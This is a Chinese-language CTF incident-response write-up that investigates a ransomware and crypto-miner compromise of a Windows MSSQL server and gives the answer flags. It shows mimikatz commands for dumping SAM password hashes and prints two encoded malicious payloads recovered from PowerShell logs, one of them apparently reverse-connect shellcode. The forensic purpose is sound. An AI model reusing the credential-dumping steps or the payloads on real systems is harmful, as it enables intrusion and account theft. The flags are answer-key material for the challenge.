从勒索到溯源：一次完整的Windows+MSSQL安全取证记录

题目信息

题目资源

题目来源：第一届solar应急响应比赛

题目文件：mssql、mssql题-备份数据库

背景 & 题目

1. 请找到攻击者创建隐藏账户的时间 --- flag格式 flag{2024/01/01 00:00:00}
2. 请找到恶意文件的名称 --- flag格式 如 flag{.}
3. 请找到恶意文件的外联地址 --- flag格式 如 flag{1.1.1.1}
4. 请修复数据库 --- flag格式 如 flag{xxxxx}
5. 请提交powershell命令中恶意文件的MD5 --- flag格式 如 flag{xxxxx}

配置一下环境免密码登录

要下载PE镜像

https://www.hotpe.top/download/

然后在CD/DVD中选择该iso镜像

然后选择电源 ---> 打开电源进入固件

在boot选项中调整顺序

保存退出，打开即可

也可以分析获取密码

对vmdk文件进行取证 使用猕猴桃进行提取密码

qemu-img工具 vmdk => raw

使用qemu-img工具将vmdk文件转换为raw文件

qemu-img convert -f vmdk mssql-disk1.vmdk -O raw 1.raw

FTK 分析 raw 文件

用FTK工具分析raw文件

导入Image File选择转换的raw文件

C:WindowsSystem32configSAM

C:WindowsSystem32configSYSTEM

找到 SAM文件和SYSTEM

然后使用mimikatz分析

mimikatz # privilege::debugmimikatz # lsadump::sam /sam:SAM /system:SYSTEM

拿去破解

得到密码

解题过程

flag1

请找到攻击者创建隐藏账户的时间

在D盘看到了一个勒索文件X3rmENR07.README.txt

搜索该名字X3rmENR07，很多文件，但里面内容都是乱码

查看日志文件

在 Windows 系统中，用户账户被创建会记录在 安全日志 中

D:WindowsSystem32winevtLogsSecurity.evtx

筛选事件ID4720 ---> 用户账户已创建

第一个就是创建的隐藏账户

flag{2024/12/16 15:24:21}

flag2

请找到恶意文件的名称

要寻找恶意文件，最快速的方法就是查杀

我这里用的是火绒，查出来的进行尝试

flag{xmrig.exe}

flag3

请找到恶意文件的外联地址

也就是要分析恶意文件，可以给云查杀进行分析，但是我尝试了，没有分析出IP地址，只有一个不相关的Url地址

来到xmrig.exe所在的目录，发现有一个config.json文件 => 配置类文件

打开发现有一个url但不是IP地址啊，可以进行DNS解析

https://tool.chinaz.com/dns/sierting.com

flag{203.107.45.167}

flag4

请修复数据库

搜索相关文件(mdf)，由于被勒索，可以加上后缀(X3rmENR07)，

看到了这个LargeDataDB文件路径

"D:Program FilesMicrosoft SQL ServerMSSQL13MSSQLSERVERMSSQLDATALargeDataDB.mdf.X3rmENR07"

通过FTK进行导入，查找到该文件，搜索flag

flag{E4r5t5y6Mhgur89g}

flag5

请提交powershell命令中恶意文件的MD5

Windows PowerShell.evtx 是一个 事件日志文件，它专门用于记录 Windows PowerShell 执行的相关事件。这些日志文件会记录所有通过 PowerShell 执行的命令、脚本、以及与 PowerShell 相关的警告或错误信息。

C:WindowsSystem32winevtLogsWindows PowerShell.evtx

复制到物理机上进行分析，里面都是各种执行的命令

这里有一个base64编码字符串，与gz压缩文件有关

官方脚本

import base64base64_data = '''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'''padding = '=' * (4 - len(base64_data) % 4)base64_data += paddingcompressed_data = base64.b64decode(base64_data)with open("output.gz", "wb") as f:    f.write(compressed_data)print("保存成功")

得到的gz文件进行解压，得到txt文件，打开之后，经过分析，这是执行了shellcode

import base64base64_data = "/EiD5PDozAAAAEFRQVBSUUgx0lZlSItSYEiLUhhIi1IgTTHJSItyUEgPt0pKSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0ItIGESLQCBJAdBQ41ZI/8lNMclBizSISAHWSDHAQcHJDaxBAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEFYQVheSAHQWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCAAG9wKiu3EFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1WoKQV5QUE0xyU0xwEj/wEiJwkj/wEiJwUG66g/f4P/VSInHahBBWEyJ4kiJ+UG6maV0Yf/VhcB0Ckn/znXl6JMAAABIg+wQSIniTTHJagRBWEiJ+UG6AtnIX//Vg/gAflVIg8QgXon2akBBWWgAEAAAQVhIifJIMclBulikU+X/1UiJw0mJx00xyUmJ8EiJ2kiJ+UG6AtnIX//Vg/gAfShYQVdZaABAAABBWGoAWkG6Cy8PMP/VV1lBunVuTWH/1Un/zuk8////SAHDSCnGSIX2dbRB/+dYagBZScfC8LWiVv/V"padding = '=' * (4 - len(base64_data) % 4)base64_data += paddingdecoded_data = base64.b64decode(base64_data)with open('data.bin', 'wb') as file:    file.write(decoded_data)print("保存成功")

flag{d72000ee7388d7d58960db277a91cc40}

参考资料：

https://blog.csdn.net/solarset/article/details/144318706